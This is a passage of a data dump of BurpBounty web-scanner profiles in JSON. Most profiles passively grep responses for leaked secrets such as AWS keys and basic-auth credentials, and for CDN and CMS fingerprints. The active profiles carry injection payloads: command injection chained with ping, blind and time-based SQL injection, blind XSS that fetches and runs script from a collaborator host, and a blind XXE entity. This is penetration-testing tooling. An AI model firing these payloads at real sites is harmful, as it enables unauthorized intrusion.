language
stringlengths 0
24
| filename
stringlengths 9
214
| code
stringlengths 99
9.93M
|
---|---|---|
BitBake | BurpBounty/profiles/AWS_Secret_Key.bb | [
{
"ProfileName": "AWS_Secret_Key",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(?i)aws(.{0,20})?(?-i)[\u0027\\\"][0-9a-zA-Z\\/+]{40}[\u0027\\\"]"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "AWS Secret Key",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Azure_Blob_Discovered.bb | [
{
"ProfileName": "Azure_Blob_Discovered",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,http(?:s):\\/\\/.[^\u003e\u003c\\\u0027\\\" \\n\\)]+.blob.core.windows.net\\/.[^\u003e\u003c\\\u0027\\\" \\n\\/)]+.\\/"
],
"Tags": [
"All",
"Cloud"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Azure Blob Url detected",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "Azure Blob Url detected",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Basic_Auth_Credentials.bb | [
{
"ProfileName": "Basic_Auth_Credentials",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(?\u003c\u003d:\\/\\/)[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\\.[a-zA-Z]+"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Basic Auth Credentials",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Bitcoin_Address.bb | [
{
"ProfileName": "Bitcoin_Address",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Bitcoin Address",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/BlindRCE.bb | [
{
"ProfileName": "BlindRCE",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true, || ping -c 2 {BC}",
"true, | ping -c 2 {BC}",
"true,; ping -c 2 {BC}",
"true, \u0026\u0026 ping -c 2 {BC}",
"true, \u0026 ping -c 2 {BC}"
],
"Encoder": [],
"UrlEncode": true,
"CharsToUrlEncode": "|;\u0026",
"Grep": [],
"Tags": [
"Collaborator",
"RCE",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 4,
"MaxRedir": 0,
"payloadPosition": 2,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "BlindRCE",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "RCE with el payloads: \u003cbr\u003e \u003cpayload\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/BlindSQLi-ContentLength.bb | [
{
"ProfileName": "BlindSQLi-ContentLength",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true, or 1\u003d2",
"true, or 1\u003d2-- ",
"true, or 1\u003d2#",
"true, or 1\u003d2/*",
"true, and 1\u003d2--",
"true, and 1\u003d2",
"true, and 1\u003d2#",
"true, and 1\u003d2/*",
"true,\u0027 or \u00271\u0027\u003d\u00272",
"true,\u0027 and \u00271\u0027\u003d\u00272"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "3000",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 6,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 2,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "BlindSQLi-ContentLength",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "Blind SQL injection found.",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/BlindSQLi-TimeBased.bb | [
{
"ProfileName": "BlindSQLi-TimeBased",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,\u0027 and sleep 12--",
"true,\u0027 and sleep 12",
"true,\u0027 and sleep 12 and \u00271\u0027\u003d\u00271",
"true,\u0027 and sleep(12) and \u00271\u0027\u003d\u00271",
"true,\u0027 and sleep(12)--",
"true,\u0027 and sleep(12)",
"true,;sleep(12)--",
"true,\u0027 SELECT BENCHMARK(1200000,MD5(\u0027A\u0027));",
"true,\u0027 SELECT SLEEP(12); #",
"true,\u0027 WAITFOR DELAY \u00270:0:12\u0027--",
"true,\u0027 WAITFOR DELAY \u00270:0:12\u0027",
"true,\u0027 SELECT pg_sleep(12);"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [],
"Tags": [
"SQLi",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 5,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 2,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "BlindSQLi-TimeBased",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/BlindXSS.bb | [
{
"ProfileName": "BlindXSS",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,\u003cscript\u003e$.getScript(\"//{BC}\")\u003c/script\u003e",
"true,\u003cscript\u003efunction b(){eval(this.responseText)};a\u003dnew XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//{BC}\");a.send();\u003c/script\u003e",
"true,\"\u003e\u003cscript src\u003dhttp://{BC}\u003e\u003c/script\u003e",
"true,javascript:eval(\u0027var a\u003ddocument.createElement(\\\u0027script\\\u0027);a.src\u003d\\\u0027http://{BC}\\\u0027;document.body.appendChild(a)\u0027)"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [],
"Tags": [
"XSS",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 0,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "BlindXSS",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "Blind XSS found with payloads: \u003cbr\u003e \u003cpayload\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/BlindXXE.bb | [
{
"ProfileName": "BlindXXE",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"http://{BC}\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [],
"Tags": [
"XXE",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 0,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "BlindXXE",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "BLIND XXE found",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Cache-Control.bb | [
{
"ProfileName": "Cache-Control",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,Cache-Control: no-store"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": true,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": true,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Cache-Control",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "Security Header \"Cache-Control\" not present in response.",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/CDN_Detected.bb | [
{
"ProfileName": "CDN_Detected",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,.clients.turbobytes.net",
"true,Or,.turbobytes-cdn.com",
"true,Or,.afxcdn.net",
"true,Or,.akamai.net",
"true,Or,.akamaiedge.net",
"true,Or,.akadns.net",
"true,Or,.akamaitechnologies.com",
"true,Or,.gslb.tbcache.com",
"true,Or,.cloudfront.net",
"true,Or,.anankecdn.com.br",
"true,Or,.att-dsa.net",
"true,Or,.azioncdn.net",
"true,Or,.belugacdn.com",
"true,Or,.bluehatnetwork.com",
"true,Or,.systemcdn.net",
"true,Or,.cachefly.net",
"true,Or,.cdn77.net",
"true,Or,.cdn77.org",
"true,Or,.panthercdn.com",
"true,Or,.cdngc.net",
"true,Or,.gccdn.net",
"true,Or,.gccdn.cn",
"true,Or,.cdnify.io",
"true,Or,.ccgslb.com",
"true,Or,.ccgslb.net",
"true,Or,.c3cache.net",
"true,Or,.chinacache.net",
"true,Or,.c3cdn.net",
"true,Or,.lxdns.com",
"true,Or,.speedcdns.com",
"true,Or,.mwcloudcdn.com",
"true,Or,.cloudflare.com",
"true,Or,.cloudflare.net",
"true,Or,.edgecastcdn.net",
"true,Or,.fastly.net",
"true,Or,.fastlylb.net",
"true,Or,.googlesyndication.com",
"true,Or,.googleusercontent.com",
"true,Or,.l.doubleclick.net",
"true,Or,.hiberniacdn.com",
"true,Or,.hwcdn.net",
"true,Or,.incapdns.net",
"true,Or,.inscname.net",
"true,Or,.insnw.net",
"true,Or,.internapcdn.net",
"true,Or,.kxcdn.com",
"true,Or,.lswcdn.net",
"true,Or,.footprint.net",
"true,Or,.llnwd.net",
"true,Or,.lldns.net",
"true,Or,.netdna-cdn.com",
"true,Or,.netdna-ssl.com",
"true,Or,.netdna.com",
"true,Or,.stackpathdns.com",
"true,Or,.mncdn.com",
"true,Or,.instacontent.net",
"true,Or,.mirror-image.net",
"true,Or,.cap-mii.net",
"true,Or,.rncdn1.com",
"true,Or,.simplecdn.net",
"true,Or,.swiftcdn1.com",
"true,Or,.swiftserve.com",
"true,Or,.gslb.taobao.com",
"true,Or,.cdn.bitgravity.com",
"true,Or,.cdn.telefonica.com",
"true,Or,.vo.msecnd.net",
"true,Or,.ay1.b.yahoo.com",
"true,Or,.yimg.com",
"true,Or,.zenedge.net"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": true,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "CDN Detected",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Cisco_ASA_Device_Found.bb | [
{
"ProfileName": "Cisco_ASA_Device_Found",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,+CSCOE+",
"true,Or,+CSCOT+"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Cisco ASA Device Found (Passive)",
"IssueSeverity": "Low",
"IssueConfidence": "Certain",
"IssueDetail": "Cisco ASA Device Found (Passive)",
"RemediationDetail": "Cisco ASA Device Found (Passive)",
"IssueBackground": "Cisco ASA Device Found (Passive)",
"RemediationBackground": "Cisco ASA Device Found (Passive)",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Cloudinary_Basic_Auth.bb | [
{
"ProfileName": "Cloudinary_Basic_Auth",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,cloudinary:\\/\\/[0-9]{15}:[0-9A-Za-z]+@[a-z]+"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Cloudinary Basic Auth",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/CMSDetection.bb | [
{
"ProfileName": "CMSDetection",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,Wordpress",
"true,Or,Drupal",
"true,Or,Joomla",
"true,Or,Magento",
"true,Or,concre5",
"true,Or,SharePoint",
"true,Or,django",
"true,Or,XOOPS",
"true,Or,BigCommerce",
"true,Or,Weebly",
"true,Or,Ecwid",
"true,Or,3dcart",
"true,Or,WooCommerce"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "CMSDetection",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "CMS Found: \u003cbr\u003e\u003cgrep\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/CMS_Found.bb | [
{
"ProfileName": "CMS_Found",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,Wordpress",
"true,Or,Drupal",
"true,Or,Joomla",
"true,Or,Magento",
"true,Or,Webnode",
"true,Or,Shopsys",
"true,Or,Shoptet",
"true,Or,vBulletin",
"true,Or,Liferay",
"true,Or,A-Blog Cms",
"true,Or,AVE cms",
"true,Or,Adobe Dreamweaver",
"true,Or,Adobe GoLive",
"true,Or,Adobe Muse",
"true,Or,Advantshop",
"true,Or,Agility CMS",
"true,Or,Alterian",
"true,Or,Amiro.CMS",
"true,Or,Apache Lenya",
"true,Or,ASP.NET",
"true,Or,Backdrop CMS",
"true,Or,BaseKit",
"true,Or,Big Cartel",
"true,Or,Bigace",
"true,Or,Blogger",
"true,Or,Bolt",
"true,Or,Bootply",
"true,Or,Bricolage CMS",
"true,Or,C1 CMS",
"true,Or,CM4all",
"true,Or,CMS-Tool",
"true,Or,CMS Made Simple",
"true,Or,CMSimple",
"true,Or,CMSimple_XH",
"true,Or,CanalBlog",
"true,Or,Cargo",
"true,Or,Centricity",
"true,Or,Chevereto",
"true,Or,Ciashop",
"true,Or,CivicEngage",
"true,Or,CoffeeCup",
"true,Or,CommonSpot",
"true,Or,Contao",
"true,Or,Contenido CMS",
"true,Or,Contensis CMS",
"true,Or,ContentXXL",
"true,Or,Convio",
"true,Or,Coppermine",
"true,Or,CoreMedia CMS",
"true,Or,Corepublish",
"true,Or,Crowd Fusion",
"true,Or,CubeCart",
"true,Or,DIAFAN.CMS",
"true,Or,DNN",
"true,Or,Danneo",
"true,Or,DataLife Engine",
"true,Or,Dealer.com",
"true,Or,DealerFire",
"true,Or,Demandware",
"true,Or,Dim Works",
"true,Or,Discourse",
"true,Or,Hycus",
"true,Or,Discuz!",
"true,Or,DokuWiki",
"true,Or,DotClear",
"true,Or,DotEasy",
"true,Or,LiteCart",
"true,Or,DreamCommerce",
"true,Or,Duda",
"true,Or,Dynamicweb",
"true,Or,E+ CMS",
"true,Or,E-monsite",
"true,Or,ECShop",
"true,Or,Easysite",
"true,Or,EditPlus",
"true,Or,Edito",
"true,Or,Enonic CMS",
"true,Or,Episerver",
"true,Or,Everweb",
"true,Or,Fork CMS",
"true,Or,Zeta Producer",
"true,Or,Flarum",
"true,Or,Format",
"true,Or,FrontPage",
"true,Or,GX Web Manager",
"true,Or,Geeklog",
"true,Or,GetSimple CMS",
"true,Or,Ghost",
"true,Or,GoDaddy Website Builder",
"true,Or,Google Sites",
"true,Or,Government Site Builder",
"true,Or,GraffitiCMS",
"true,Or,Grav CMS",
"true,Or,Hexo",
"true,Or,Homes.com Fusion",
"true,Or,Homestead",
"true,Or,HostCMS",
"true,Or,HostedShop",
"true,Or,HubSpot",
"true,Or,Hugo",
"true,Or,HumHub",
"true,Or,IPS Community Suite",
"true,Or,ImageCMS",
"true,Or,Immediacy",
"true,Or,Imperia CMS",
"true,Or,ImpressCMS",
"true,Or,ImpressPages CMS",
"true,Or,Infopark CMS Fiona",
"true,Or,InstantCMS",
"true,Or,InterRed",
"true,Or,Intershop",
"true,Or,JTL-Shop",
"true,Or,Jadu CMS",
"true,Or,Jekyll",
"true,Or,JetShop",
"true,Or,Jieqi CMS",
"true,Or,Jimdo",
"true,Or,JustSystems Homepage Builder",
"true,Or,KVS CMS",
"true,Or,Koken",
"true,Or,Komodo CMS",
"true,Or,Kooboo",
"true,Or,Kryptronic",
"true,Or,Labrador CMS",
"true,Or,Lauyan TOWeb",
"true,Or,LeadPages",
"true,Or,LightCMS",
"true,Or,Lightspeed",
"true,Or,LiveEdit",
"true,Or,Livedoor Blog",
"true,Or,Livestreet CMS",
"true,Or,Locomotive CMS",
"true,Or,LogiCommerce",
"true,Or,Loja Integrada",
"true,Or,MONO",
"true,Or,Mabisy",
"true,Or,MakeShop",
"true,Or,Mambo",
"true,Or,MaxSite CMS",
"true,Or,MediaWiki",
"true,Or,Medium",
"true,Or,Melody",
"true,Or,Metro Publisher",
"true,Or,Microsoft Word",
"true,Or,Midgard CMS",
"true,Or,Mijnwebwinkel",
"true,Or,Mintox",
"true,Or,Miva Merchant",
"true,Or,Mobirise",
"true,Or,Modified Shopsoftware",
"true,Or,Modx CMS",
"true,Or,MoinMoin",
"true,Or,Movable Type",
"true,Or,Mura",
"true,Or,Méthode",
"true,Or,NQcontent",
"true,Or,Nation Builder",
"true,Or,Neos",
"true,Or,NetObjects",
"true,Or,NetSuite",
"true,Or,Netvolution",
"true,Or,Nextcloud",
"true,Or,Ning",
"true,Or,Nodebb",
"true,Or,Notepad++",
"true,Or,Nucleus CMS",
"true,Or,NukeViet",
"true,Or,OU Campus",
